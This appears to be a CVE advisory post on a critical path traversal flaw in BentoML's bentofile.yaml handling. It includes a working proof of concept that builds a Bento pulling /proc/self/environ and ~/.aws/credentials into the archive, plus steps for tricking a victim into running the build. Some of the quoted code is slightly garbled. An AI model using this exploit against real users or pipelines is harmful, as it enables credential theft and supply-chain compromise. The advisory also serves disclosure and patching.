BentoML, Path Traversal Vulnerability, Critical

Listen to this Post

The vulnerability exists in BentoML’s file path resolution for the `bentofile.yaml` configuration. The `resolve_user_filepath` function and direct `Path.joinpath` usage lack validation to prevent path traversal. When building a Bento, user-supplied paths in the description, docker.setup_script, docker.dockerfile_template, and `conda.environment_yml` fields are resolved. An attacker can craft paths using `../` sequences, absolute paths, or environment variable expansion ($HOME) to point outside the build context. The functions then copy the targeted file (e.g., /etc/passwd, /proc/self/environ, ~/.ssh/id_rsa) into the resulting Bento archive. This occurs because `os.path.realpath` and `shutil.copy` are used without checking if the final path is contained within the intended context directory, leading to arbitrary file exfiltration.
Platform: BentoML
Version: Vulnerable versions
Vulnerability: Path Traversal
Severity: Critical
date: 2024-08-15

Prediction: 2024-09-15

What Undercode Say:

cat > bentofile.yaml << 'EOF'
service: "service.py:TestService"
description: "file:/proc/self/environ"
docker:
dockerfile_template: "$HOME/.aws/credentials"
EOF
bentoml build
cat ~/bentoml/bentos/test_service//README.md | tr '\0' '\n' | grep AWS_
Vulnerable code snippet
def resolve_user_filepath(filepath: str, ctx: t.Optional[bash]) -> str:
_path = os.path.expanduser(os.path.expandvars(filepath))
if not os.path.isabs(_path) and ctx:
_path = os.path.expanduser(os.path.join(ctx, filepath))
if os.path.exists(_path):
return os.path.realpath(_path) Missing containment check

How Exploit:

1. Create malicious `bentofile.yaml` with traversal paths.

2. Trick victim into running `bentoml build`.

  1. Exfiltrated files are embedded in the Bento archive.

4. Retrieve secrets via BentoCloud or shared registry.

Protection from this CVE

  • Validate resolved paths.
  • Restrict to build context.
  • Apply path sanitization.
  • Update BentoML version.

Impact:

  • Credential Theft
  • Supply Chain Compromise
  • CI/CD Secret Exposure
  • Data Exfiltration

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top